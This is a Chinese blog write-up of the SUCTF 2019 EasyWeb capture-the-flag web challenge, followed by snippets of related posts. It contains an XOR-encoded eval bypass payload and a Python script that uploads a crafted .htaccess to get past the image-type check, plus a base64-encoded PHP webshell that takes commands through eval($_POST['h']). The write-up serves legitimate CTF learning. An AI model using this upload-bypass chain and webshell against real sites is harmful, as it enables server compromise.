[wp][SUCTF 2019]EasyWeb

最新推荐文章于 2025-02-15 23:00:00 发布
原创 最新推荐文章于 2025-02-15 23:00:00 发布 · 166 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

这篇博客探讨了PHP代码中的文件上传安全问题。通过分析`get_the_flag`函数,可以看出代码存在过滤不严的漏洞,允许恶意用户通过构造特殊字符组合绕过限制,实现PNG+htaccess文件上传。作者详细展示了如何利用这些漏洞构造请求,包括创建.htaccess文件来改变文件解析方式,并上传PHP后门。虽然成功上传,但由于open_basedir限制,无法直接获取flag。解决这个问题可能需要利用蚁剑等工具进行进一步操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

先看后半段
构造$_GET()

_GET %FF%FF%FF%FF^%A0%B8%BA%AB
${%FF%FF%FF%FF^%A0%B8%BA%AB}($%ff)()&$%ff=phpinfo

?_=${%FF%FF%FF%FF^%A0%B8%BA%AB}{%ff}();&%ff=phpinfo

上面那一段,就是使用png+htaccess 上传就可以

<?php

 $a = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
 echo $a;

获得上传路径

import requests
import base64

rqurl="http://1cb8e60f-703b-4879-95cb-df61ee50a07d.node4.buuoj.cn:81/"
payload1="?_=${%FF%FF%FF%FF^%A0%B8%BA%AB}{%ff}();&%ff=get_the_flag"
url=rqurl+payload1
#通过define绕过exif_imagetype函数
htaccess = b"""
#define width 1337
#define height 1337 
AddType application/x-httpd-php .abc
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_c47b21fcf8f0bc8b3920541abd8024fd/shell.abc"
"""
shell = b"GIF89a00" + base64.b64encode(b"<?php eval($_POST['h']);?>")


files = {'file':('.htaccess',htaccess,'image/jpeg')}
data = {"upload":"Submit"}
response = requests.post(url=url, data=data, files=files)
print(response.text)

files = {'file':('shell.abc',shell,'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)

连上后看不到flag 原因 需要绕过open_basedir
使用蚁剑插件

在这里插入图片描述

Buu - [SUCTF 2019]EasyWeb
夜风的博客
05-07 546
> 这个函数两个参数,第一个参数提供字符串,第二个提供统计模式(0, 1, 2, 3) 0是默认值-> 1:返回字符串中每个字节出现的次数;3:以整数形式返回。
CTF训练计划—[CISCN2019]Easyweb
Lemon's blog
08-14 1565
前言: 这道题学到不少知识,还卡了很长时间,单独记录一下 [CISCN2019]Easyweb 首先拿到一个登陆框,从这里就要思考是要怎么去做,我在做的时候想到三个方面去尝试 burp抓包看有什么线索没 SQL万能密码注入 页面扫描,看看有什么源码泄露或者robots.txt 前两个都行不通,刚开始页面扫描的时候也没有扫到什么,然后就彻底懵了,后来发现是工具犯病了,再扫一次就出来了 一个robots.txt文件,访问可以发现提示的是备份文件,但没说具体的文件名 就利用排除法,一个一个的去试试,目前知
[SUCTF 2019]EasyWeb 1
fmyyy1的博客
04-09 1074
上来就是源码 <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir); } if(!empty($_FILES["file"])){
1.【BUUCTF】[SUCTF 2019]EasyWeb
最新发布
2401_86760082的博客
02-15 1185
进入题目页面如下给出源码开始代码审计代码使用 eval($hhh);执行用户通过 GET 请求传入的 _ 参数的值,对参数的过滤有长度和字符种类的限制。
[SUCTF 2019]EasyWeb
01-08
### SUCTF 2019 EasyWeb Writeup #### 题目概述 题目提供了一个存在安全漏洞的 Web 应用程序,目标是利用这些漏洞获取服务器上的敏感信息或执行任意代码。 #### 利用.htaccess绕过PHP过滤机制 由于题目环境中的 ...
BUUCTF WEB [安洵杯 2019]easy_web 1 WP
Whaocai的博客
08-02 1612
考点: md5强碰撞 php代码审计–正则表达式 F12看到md5 is funny~ ,猜测与md5算法有关。注意到<img>标签和url地址栏,img参数是文件名的某种加密后的,将读取到的文件内容base64加密之后,输出到img标签中。 这个时候,要想办法知道img参数是怎么加密的,查看wp之后,发现后端会对传进去的img参数先进行两次base64解密,再进行一次hex解密。所以我们在payload时要先进行一次hex加密,再进行两次base64加密 同理然后读取一下index.php,再
layui easyweb iframe v3.1.8源码
12-08
[增加] 增加fixed方式的select,可用在表格、滚动弹窗中 [增加] 增加动态模板功能 [增加] 主页工作台、控制台的内容进行了补充完善 ...[增加] loading风格增加了一个layui简约样式 ...[优化] 切换tab自动刷新支持每个子...
SUCTF2019 EasyWeb
segogt的博客
11-27 1257
SUCTF2019 EasyWeb 考察了3层内容 1.绕过正则匹配限制 $hhh = @$_GET['_']; if (!$hhh){ highlight_file(__FILE__); } if(strlen($hhh)>18){ die('One inch long, one inch strong!'); } if ( preg_match('/[\x00- 0...
BUU WEB [SUCTF 2019]EasyWeb
A_dmin的博客
04-19 3495
BUU WEB [SUCTF 2019]EasyWeb emmm,这道题目涉及到较多知识点,就单独记录一下 首先打开网页可以看见源码: <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_...
[BUUCTF][SUCTF 2019]EasyWeb
cosmoslin的博客
10-31 650
[SUCTF 2019]EasyWeb <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir); } if(!empty($_FILE
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值